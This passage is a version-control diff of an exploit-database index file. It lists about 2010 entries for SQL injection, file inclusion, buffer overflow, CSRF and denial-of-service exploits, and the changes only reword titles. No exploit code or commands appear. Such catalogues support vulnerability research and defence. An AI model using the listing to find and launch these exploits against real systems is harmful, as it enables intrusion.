exploit",2010-04-11,zombiefx,windows,remote,0 -12153,platforms/php/webapps/12153.txt,"joomla component education SQL injection Vulnerability",2010-04-11,bumble_be,php,webapps,0 +12152,platforms/windows/remote/12152.pl,"Trellian FTP Client PASV BOF Exploit",2010-04-11,zombiefx,windows,remote,0 +12153,platforms/php/webapps/12153.txt,"joomla component education SQL Injection Vulnerability",2010-04-11,bumble_be,php,webapps,0 12154,platforms/php/dos/12154.txt,"vBulletin ""Cyb - Advanced Forum Statistics"" DoS",2010-04-10,"Andhra Hackers",php,dos,0 12155,platforms/php/webapps/12155.txt,"AuroraGPT 4.0 - RCE Vulnerability",2010-04-11,"Amoo Arash",php,webapps,0 12156,platforms/windows/remote/12156.txt,"IE/Opera source code viewer Null Character Handling",2010-04-11,"Daniel Correa",windows,remote,0 @@ -11087,7 +11087,7 @@ id,file,description,date,author,platform,type,port 12159,platforms/php/webapps/12159.txt,"Joomla Component Multi-Venue Restaurant Menu Manager SQL Injection Vulnerability",2010-04-11,Valentin,php,webapps,0 12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0 12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption PoC",2010-04-11,LiquidWorm,windows,dos,0 -12162,platforms/php/webapps/12162.txt,"Joomla component mv_restaurantmenumanager SQL injection Vulnerability",2010-04-11,Sudden_death,php,webapps,0 +12162,platforms/php/webapps/12162.txt,"Joomla component mv_restaurantmenumanager SQL Injection Vulnerability",2010-04-11,Sudden_death,php,webapps,0 12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS SQL Injection Vulnerability",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0 12164,platforms/php/webapps/12164.txt,"YaPig 0.94.0u - Remote File Inclusion Vulnerability",2010-04-12,JIKO,php,webapps,0 12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 getopt() Denial of Service",2010-04-12,Napst3r,multiple,dos,0 @@ -11113,14 +11113,14 @@ id,file,description,date,author,platform,type,port 12185,platforms/php/webapps/12185.txt,"Joomla Component com_flexicontent Local File Vulnerability",2010-04-12,eidelweiss,php,webapps,0 12186,platforms/php/webapps/12186.pl,"vBulletin DoS - all version",2010-04-12,"Jim Salim",php,webapps,0 12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-12,"cr4wl3r ",php,webapps,0 -12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0 +12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string Vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles (aid) SQL Injection Vulnerability",2010-04-13,"Don Tukulesto",php,webapps,0 12191,platforms/php/webapps/12191.txt,"joomla component com_jp_jobs 1.2.0 - (id) SQL Injection Vulnerability",2010-04-13,v3n0m,php,webapps,0 12192,platforms/php/webapps/12192.txt,"blog system <= 1.5 - Multiple Vulnerabilities",2010-04-13,"cp77fk4r ",php,webapps,0 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability",2010-04-13,"cr4wl3r ",php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-13,"cr4wl3r ",php,webapps,0 -12195,platforms/php/webapps/12195.rb,"joelz bulletin board <= 0.9.9rc3 multiple SQL Injection & Exploit",2010-04-13,"Easy Laster",php,webapps,0 +12195,platforms/php/webapps/12195.rb,"joelz bulletin board <= 0.9.9rc3 - Multiple SQL Injection & Exploit",2010-04-13,"Easy Laster",php,webapps,0 12197,platforms/asp/webapps/12197.txt,"Mp3 MuZik Data Base Download Vulnerability",2010-04-13,indoushka,asp,webapps,0 12198,platforms/php/webapps/12198.txt,"Games Script (Galore) Backup Dump Vulnerability",2010-04-13,indoushka,php,webapps,0 12199,platforms/asp/webapps/12199.txt,"My School Script Data Base Download Vulnerability",2010-04-13,indoushka,asp,webapps,0 @@ -11161,7 +11161,7 @@ id,file,description,date,author,platform,type,port 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability",2010-04-14,eidelweiss,php,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities",2010-04-14,wsn1983,jsp,webapps,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 -12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 +12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x - (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability",2010-04-15,"AnGrY BoY",php,webapps,0 12246,platforms/php/webapps/12246.txt,"joomla component com_iproperty 1.5.3 - (id) SQL Injection Vulnerability",2010-04-15,v3n0m,php,webapps,0 12247,platforms/windows/remote/12247.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)",2010-04-15,dookie,windows,remote,0 @@ -11169,7 +11169,7 @@ id,file,description,date,author,platform,type,port 12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion Vulnerability",2010-04-15,eidelweiss,php,webapps,0 12250,platforms/windows/remote/12250.html,"Magneto Net Resource ActiveX 4.0.0.5 - NetShareEnum Exploit (Universal)",2010-04-15,dookie,windows,remote,0 12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-15,eidelweiss,php,webapps,0 -12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0 +12252,platforms/hardware/dos/12252.txt,"IBM BladeCenter Management Module - DoS Vulnerability",2010-04-15,"Alexey Sintsov",hardware,dos,0 12254,platforms/php/webapps/12254.txt,"CMS (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-16,Mr.MLL,php,webapps,0 12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (meta)",2010-04-16,blake,windows,local,0 12256,platforms/php/webapps/12256.txt,"ilchClan <= 1.0.5B SQL Injection Vulnerability Exploit",2010-04-16,"Easy Laster",php,webapps,0 @@ -11206,13 +11206,13 @@ id,file,description,date,author,platform,type,port 12290,platforms/php/webapps/12290.txt,"Joomla Component Contact Us Google Map com_google Local File Inclusion Vulnerability",2010-04-18,AntiSecurity,php,webapps,0 12291,platforms/php/webapps/12291.txt,"Joomla Component iF surfALERT com_if_surfalert Local File Inclusion Vulnerability",2010-04-18,AntiSecurity,php,webapps,0 12292,platforms/php/webapps/12292.txt,"Flex File Manager Shell Upload Vulnerability",2010-04-19,Mr.MLL,php,webapps,0 -12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack buffer overflow",2010-04-19,corelanc0d3r,windows,local,0 +12293,platforms/windows/local/12293.py,"TweakFS 1.0 (FSX Edition) Stack Buffer overflow",2010-04-19,corelanc0d3r,windows,local,0 12294,platforms/windows/dos/12294.txt,"avtech software (avc781viewer.dll) activex Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 12295,platforms/php/webapps/12295.txt,"N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability",2010-04-19,eidelweiss,php,webapps,0 12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 (RFI/LFI) Multiple File Include Vulnerability",2010-04-19,"cr4wl3r ",php,webapps,0 12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c Denial of Service and Modem Reset",2010-04-19,hkm,hardware,dos,0 12298,platforms/hardware/remote/12298.txt,"Huawei EchoLife HG520 Remote Information Disclosure",2010-04-19,hkm,hardware,remote,0 -12299,platforms/php/webapps/12299.txt,"Joomla Component GBU FACEBOOK 1.0.5 - SQL injection vulnerability",2010-04-19,kaMtiEz,php,webapps,0 +12299,platforms/php/webapps/12299.txt,"Joomla Component GBU FACEBOOK 1.0.5 - SQL Injection Vulnerability",2010-04-19,kaMtiEz,php,webapps,0 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 12302,platforms/windows/dos/12302.html,"HP Operations Manager <= 8.16 - (srcvw4.dll) LoadFile()/SaveFile() Remote Unicode Stack Overflow PoC",2010-04-20,mr_me,windows,dos,0 12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection Exploit",2010-04-20,Ctacok,php,webapps,0 @@ -11228,10 +11228,10 @@ id,file,description,date,author,platform,type,port 12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Upload Shell Vulnerability",2010-04-21,cyberlog,php,webapps,0 12316,platforms/php/webapps/12316.txt,"Joomla Component wmi (com_wmi) LFI Vulnerability",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0 12317,platforms/php/webapps/12317.txt,"Joomla Component OrgChart com_orgchart Local File Inclusion Vulnerability",2010-04-21,AntiSecurity,php,webapps,0 -12318,platforms/php/webapps/12318.txt,"Joomla Component MMS Blog com_mmsblog Local File Inclusion Vulnerability",2010-04-21,AntiSecurity,php,webapps,0 -12319,platforms/php/webapps/12319.txt,"e107 CMS <= 0.7.19 CSRF Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0 +12318,platforms/php/webapps/12318.txt,"Joomla Component Mms Blog com_mmsblog Local File Inclusion Vulnerability",2010-04-21,AntiSecurity,php,webapps,0 +12319,platforms/php/webapps/12319.txt,"e107 CMS <= 0.7.19 - CSRF Vulnerability",2010-04-21,"High-Tech Bridge SA",php,webapps,0 12320,platforms/windows/remote/12320.txt,"Viscom Software Movie Player Pro SDK ActiveX 6.8 - Remote Buffer Overflow",2010-04-21,shinnai,windows,remote,0 -12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x Multiple Vulnerabilite",2010-04-21,ITSecTeam,php,webapps,0 +12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilite",2010-04-21,ITSecTeam,php,webapps,0 12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Stored XSS",2010-04-21,ITSecTeam,php,webapps,0 12324,platforms/multiple/dos/12324.py,"Multiple Browsers Audio Tag DoS Vulnerability",2010-04-21,"Chase Higgins",multiple,dos,0 12325,platforms/php/webapps/12325.txt,"Joomla Component com_portfolio Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0 @@ -11268,7 +11268,7 @@ id,file,description,date,author,platform,type,port 12365,platforms/php/webapps/12365.txt,"Openplanning 1.00 (RFI/LFI) Multiple File Include Vulnerability",2010-04-24,"cr4wl3r ",php,webapps,0 12366,platforms/php/webapps/12366.txt,"Openfoncier 2.00 (RFI/LFI) Multiple File Include Vulnerability",2010-04-24,"cr4wl3r ",php,webapps,0 12367,platforms/windows/remote/12367.html,"HP Digital Imaging (hpodio08.dll) Insecure Method Exploit",2010-04-24,"ThE g0bL!N",windows,remote,0 -12368,platforms/windows/local/12368.pl,"ZipWrangler 1.20 (.zip) SEH 0day exploit",2010-04-24,"TecR0c and Sud0",windows,local,0 +12368,platforms/windows/local/12368.pl,"ZipWrangler 1.20 - (.zip) SEH Exploit (0day)",2010-04-24,"TecR0c and Sud0",windows,local,0 12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability",2010-04-24,eidelweiss,php,webapps,0 12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - XSS and Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0 12371,platforms/php/webapps/12371.txt,"WHMCS control (WHMCompleteSolution) SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 @@ -11278,13 +11278,13 @@ id,file,description,date,author,platform,type,port 12375,platforms/osx/dos/12375.c,"MacOS X 10.6 HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Remote Arbitrary File Upload Exploit",2010-04-24,eidelweiss,php,webapps,0 12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec Local File Inclusion Vulnerability",2010-04-25,R3VAN_BASTARD,php,webapps,0 -12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - (.zip) 0day stack buffer overflow PoC exploit",2010-04-25,mr_me,windows,local,0 +12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-04-25,mr_me,windows,local,0 12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 PASV BoF (SEH)",2010-04-25,zombiefx,windows,remote,0 12381,platforms/php/webapps/12381.php,"phpegasus (fckeditor) Remote Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service (0day)",2010-04-25,SeeMe,multiple,dos,0 12383,platforms/php/webapps/12383.txt,"clipak Upload Vulnerability",2010-04-25,indoushka,php,webapps,0 12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts: Shell Upload Vulnerability",2010-04-25,Sec-q8,php,webapps,0 -12385,platforms/php/webapps/12385.html,"TR Forum 1.5 insert admin CSRF Vulnerability",2010-04-25,EL-KAHINA,php,webapps,0 +12385,platforms/php/webapps/12385.html,"TR Forum 1.5 - Insert Admin CSRF Vulnerability",2010-04-25,EL-KAHINA,php,webapps,0 12386,platforms/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump Vulnerability",2010-04-25,indoushka,php,webapps,0 12387,platforms/php/webapps/12387.sh,"webessence 1.0.2 - Multiple Vulnerabilities",2010-04-25,"white_sheep, R00T_ATI and epicfail",php,webapps,0 12388,platforms/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Buffer Overflow (Meta)",2010-04-25,blake,windows,local,0 @@ -11292,7 +11292,7 @@ id,file,description,date,author,platform,type,port 12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 Local File Include Vulnerability",2010-04-26,"cr4wl3r ",php,webapps,0 12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-26,"cr4wl3r ",php,webapps,0 12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal index.php (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 -12400,platforms/php/webapps/12400.txt,"Joomla Component com_joomradio SQL injection vulnerability",2010-04-26,Mr.tro0oqy,php,webapps,0 +12400,platforms/php/webapps/12400.txt,"Joomla Component com_joomradio SQL Injection Vulnerability",2010-04-26,Mr.tro0oqy,php,webapps,0 12401,platforms/multiple/dos/12401.html,"WebKit <= 532.5 Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 12402,platforms/php/webapps/12402.txt,"Kasseler CMS 2.0.5 - Bypass / Download Backup Vulnerability",2010-04-26,indoushka,php,webapps,0 12403,platforms/windows/local/12403.py,"IDEAL Administration 2010 10.2 - Local Buffer Overflow Exploit",2010-04-26,Dr_IDE,windows,local,0 @@ -11306,8 +11306,8 @@ id,file,description,date,author,platform,type,port 12413,platforms/php/webapps/12413.txt,"i-Net Online Community XSS and Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12414,platforms/php/webapps/12414.txt,"2daybiz Auction Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 12415,platforms/php/webapps/12415.txt,"Infocus Real Estate Enterprise Edition Script Authentication Bypass",2010-04-27,Sid3^effects,php,webapps,0 -12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 Multiple Vulnerabilites",2010-04-27,ITSecTeam,php,webapps,0 -12417,platforms/windows/remote/12417.py,"Bigant Messenger <= 2.52 - (AntCore.dll) RegisterCom() Remote 0day Heap Overflow",2010-04-27,mr_me,windows,remote,0 +12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilites",2010-04-27,ITSecTeam,php,webapps,0 +12417,platforms/windows/remote/12417.py,"Bigant Messenger <= 2.52 - (AntCore.dll) RegisterCom() Remote Heap Overflow (0day)",2010-04-27,mr_me,windows,remote,0 12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 Changer Login et Mot de Passe CSRF Vulnerability",2010-04-27,indoushka,php,webapps,0 12420,platforms/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Remote Arbitrary File Upload Exploit",2010-04-27,eidelweiss,php,webapps,0 12421,platforms/php/webapps/12421.txt,"Help Center Live 2.0.6 - (module=helpcenter&file=) Local File Inclusion",2010-04-27,41.w4r10r,php,webapps,0 @@ -11322,15 +11322,15 @@ id,file,description,date,author,platform,type,port 12430,platforms/php/webapps/12430.txt,"Joomla Component graphics (com_graphics) 1.0.6 - LFI Vulnerability",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0 12431,platforms/windows/dos/12431.html,"Webmoney Advisor ActiveX Remote DoS Exploit",2010-04-28,Go0o$E,windows,dos,0 12432,platforms/php/webapps/12432.txt,"Joomla JE Property Finder Component Upload Vulnerability",2010-04-28,Sid3^effects,php,webapps,0 -12433,platforms/cgi/webapps/12433.py,"NIBE heat pump RCE exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 -12434,platforms/cgi/webapps/12434.py,"NIBE heat pump LFI exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 +12433,platforms/cgi/webapps/12433.py,"NIBE heat pump RCE Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 +12434,platforms/cgi/webapps/12434.py,"NIBE heat pump LFI Exploit",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12435,platforms/php/webapps/12435.txt,"Zabbix <= 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 12436,platforms/php/webapps/12436.txt,"Pligg CMS (story.php?id) 1.0.4 - SQL Injection Vulnerability",2010-04-28,"Don Tukulesto",php,webapps,0 12437,platforms/windows/dos/12437.html,"Safari 4.0.3 & 4.0.4 Stack Exhaustion",2010-04-28,"Fredrik Nordberg Almroth",windows,dos,0 12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 12440,platforms/php/webapps/12440.txt,"Joomla Component Wap4Joomla (wapmain.php) SQL Injection Vulnerability",2010-04-28,Manas58,php,webapps,0 -12441,platforms/php/webapps/12441.html,"gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 +12441,platforms/php/webapps/12441.html,"gpEasy <= 1.6.1 - CSRF Remote Add Admin Exploit",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection Vunerability",2010-04-28,41.w4r10r,php,webapps,0 12443,platforms/php/webapps/12443.txt,"Modelbook (casting_view.php) SQL Injection Vulnerability",2010-04-28,v3n0m,php,webapps,0 12444,platforms/php/webapps/12444.txt,"PHP Video Battle SQL Injection Vulnerability",2010-04-28,v3n0m,php,webapps,0 @@ -11339,7 +11339,7 @@ id,file,description,date,author,platform,type,port 12447,platforms/php/webapps/12447.txt,"XT-Commerce 1.0 Beta 1 - Pass / Creat and Download Backup Vulnerability",2010-04-29,indoushka,php,webapps,0 12448,platforms/php/webapps/12448.txt,"Socialware 2.2 - Upload Vulnerability and XSS",2010-04-29,Sid3^effects,php,webapps,0 12449,platforms/php/webapps/12449.txt,"deV!L`z Clanportal 1.5 - Mullti Vulnerability",2010-04-29,indoushka,php,webapps,0 -12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 XSS Vulnerability",2010-04-29,"High-Tech Bridge SA",windows,webapps,0 +12450,platforms/windows/webapps/12450.txt,"Microsoft SharePoint Server 2007 - XSS Vulnerability",2010-04-29,"High-Tech Bridge SA",windows,webapps,0 12451,platforms/php/webapps/12451.txt,"iScripts VisualCaster - SQli Vulnerability",2010-04-29,Sid3^effects,php,webapps,0 12452,platforms/php/webapps/12452.txt,"TaskFreak 0.6.2 - SQL Injection Vulnerability",2010-04-29,"Justin C. Klein Keane",php,webapps,0 12453,platforms/php/webapps/12453.txt,"Zyke CMS 1.1 - Bypass Vulnerability",2010-04-29,indoushka,php,webapps,0 @@ -11351,10 +11351,10 @@ id,file,description,date,author,platform,type,port 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"b2b gold script - (id) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 12461,platforms/php/webapps/12461.txt,"JobPost - SQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 -12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 & 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 +12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQLi Vulnerability",2010-04-30,Sid3^effects,php,webapps,0 12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerability",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0 12464,platforms/asp/webapps/12464.txt,"ASPCode CMS <= 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0 -12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL injection vulnerability",2010-04-30,Archimonde,php,webapps,0 +12465,platforms/php/webapps/12465.txt,"Joomla Component com_newsfeeds SQL Injection Vulnerability",2010-04-30,Archimonde,php,webapps,0 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion Vulnerability",2010-04-30,eidelweiss,php,webapps,0 12467,platforms/php/webapps/12467.txt,"Webthaiapp detail.php(cat) Blind SQL Injection Vulnerability",2010-04-30,Xelenonz,php,webapps,0 12468,platforms/php/webapps/12468.txt,"Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability",2010-04-30,v3n0m,php,webapps,0 @@ -11364,8 +11364,8 @@ id,file,description,date,author,platform,type,port 12473,platforms/php/webapps/12473.txt,"Joomla Component Table JX XSS Vulnerabilities",2010-05-01,Valentin,php,webapps,0 12474,platforms/php/webapps/12474.txt,"Joomla Component Card View JX XSS Vulnerabilities",2010-05-01,Valentin,php,webapps,0 12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 Local File Include Vulnerability",2010-05-01,"cr4wl3r ",php,webapps,0 -12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 Multiple Remote File Include Vulnerability",2010-05-01,"cr4wl3r ",php,webapps,0 -12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0 +12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Include Vulnerability",2010-05-01,"cr4wl3r ",php,webapps,0 +12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0 12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Auth Bypass Vulnerability",2010-05-02,LionTurk,asp,webapps,0 12479,platforms/php/webapps/12479.txt,"Joomla DJ-Classifieds Extension com_djclassifieds Upload Vulnerability",2010-05-02,Sid3^effects,php,webapps,0 12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0 @@ -11376,23 +11376,23 @@ id,file,description,date,author,platform,type,port 12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 (RFI/LFI) Multiple File Include Vulnerability",2010-05-02,"cr4wl3r ",php,webapps,0 12487,platforms/windows/dos/12487.html,"JavaScriptCore.dll Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0 12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Include Vulnerability",2010-05-03,"cr4wl3r ",php,webapps,0 -12489,platforms/php/webapps/12489.txt,"Joomla_1.6.0-Alpha2 XSS Vulnerabilities",2010-05-03,mega-itec.com,php,webapps,0 -12491,platforms/multiple/dos/12491.html,"All browsers 0day Crash Exploit",2010-05-03,"Inj3ct0r Team",multiple,dos,0 +12489,platforms/php/webapps/12489.txt,"Joomla_1.6.0-Alpha2 - XSS Vulnerabilities",2010-05-03,mega-itec.com,php,webapps,0 +12491,platforms/multiple/dos/12491.html,"All browsers - Crash Exploit (0day)",2010-05-03,"Inj3ct0r Team",multiple,dos,0 12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 Fork Bomb DoS",2010-05-03,Dr_IDE,windows,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode DoS PoC",2010-05-03,Dr_IDE,multiple,dos,0 12494,platforms/windows/dos/12494.pl,"Winamp 5.572 - Local Crash PoC (0day)",2010-05-03,R3d-D3V!L,windows,dos,0 12495,platforms/windows/remote/12495.pl,"ProSSHD 1.2 - Remote Post-Auth Exploit (ASLR and DEP bypass)",2010-05-03,"Alexey Sintsov",windows,remote,0 12496,platforms/php/webapps/12496.html,"KubeBlog CSRF",2010-05-03,The.Morpheus,php,webapps,0 -12497,platforms/windows/local/12497.c,"PhotoFiltre Studio X .tif file local buffer overflow PoC (0day)",2010-05-04,"fl0 fl0w",windows,local,0 +12497,platforms/windows/local/12497.c,"PhotoFiltre Studio X .tif file local Buffer Overflow PoC (0day)",2010-05-04,"fl0 fl0w",windows,local,0 12498,platforms/windows/remote/12498.txt,"VicFTPS 5.0 - Directory Traversal",2010-05-04,chr1x,windows,remote,0 12499,platforms/php/webapps/12499.txt,"dbhcms 1.1.4 - Stored XSS",2010-05-04,ITSecTeam,php,webapps,0 12500,platforms/php/webapps/12500.txt,"Clicksor SQL Injecti0n Vulnerability",2010-05-04,JM511,php,webapps,0 -12501,platforms/windows/local/12501.php,"Beyond Compare 3.0.13 b9599 (.zip) 0day Stack Buffer Overflow PoC Exploit",2010-05-04,mr_me,windows,local,0 +12501,platforms/windows/local/12501.php,"Beyond Compare 3.0.13 b9599 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-05-04,mr_me,windows,local,0 12504,platforms/php/webapps/12504.txt,"thEngine 0.1 - LFI Vulnerability",2010-05-04,team_elite,php,webapps,0 12506,platforms/php/webapps/12506.php,"Knowledgeroot (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-04,eidelweiss,php,webapps,0 12507,platforms/php/webapps/12507.txt,"SmartCMS 2 - SQL Injection Vulnerability",2010-05-04,Ariko-Security,php,webapps,0 -12508,platforms/osx/dos/12508.html,"history.go() DoS on multiple browsers",2010-05-04,Dr_IDE,osx,dos,0 -12509,platforms/osx/dos/12509.html,"window.print() DoS on multiple browsers",2010-05-04,Dr_IDE,osx,dos,0 +12508,platforms/osx/dos/12508.html,"history.go() DoS on Multiple browsers",2010-05-04,Dr_IDE,osx,dos,0 +12509,platforms/osx/dos/12509.html,"window.print() DoS on Multiple browsers",2010-05-04,Dr_IDE,osx,dos,0 12510,platforms/php/webapps/12510.php,"PHP-Nuke 7.0/8.1/8.1.35 - Wormable Remote Code Execution",2010-05-05,"Michael Brooks",php,webapps,0 12511,platforms/windows/remote/12511.txt,"MDaemon Mailer Daemon 11.0.1 - Remote File Disclosure",2010-05-05,kingcope,windows,remote,0 12512,platforms/windows/remote/12512.py,"Ziepod+ 1.0 Cross Application Scripting",2010-05-05,sinn3r,windows,remote,0 @@ -11409,7 +11409,7 @@ id,file,description,date,author,platform,type,port 12524,platforms/windows/dos/12524.py,"Windows SMB2 Negotiate Protocol (0x72) Response DoS",2010-05-07,"Jelmer de Hen",windows,dos,0 12525,platforms/php/webapps/12525.txt,"PHP-Nuke 'friend.php' Module Remote SQL Injection",2010-05-07,CMD,php,webapps,0 12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) SQL Injection Vulnerability",2010-05-07,Ra3cH,asp,webapps,0 -12527,platforms/asp/webapps/12527.txt,"Administrador de Contenidos Admin Login Bypass vulnerability",2010-05-07,Ra3cH,asp,webapps,0 +12527,platforms/asp/webapps/12527.txt,"Administrador de Contenidos Admin Login Bypass Vulnerability",2010-05-07,Ra3cH,asp,webapps,0 12528,platforms/windows/local/12528.pl,"AVCON H323Call Buffer Overflow",2010-05-07,"Dillon Beresford",windows,local,0 12529,platforms/windows/dos/12529.py,"ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit",2010-05-07,"Oleksiuk Dmitry, eSage Lab",windows,dos,0 12530,platforms/windows/dos/12530.rb,"TFTPGUI 1.4.5 - Long Transport Mode Overflow DoS (Meta)",2010-05-08,"Jeremiah 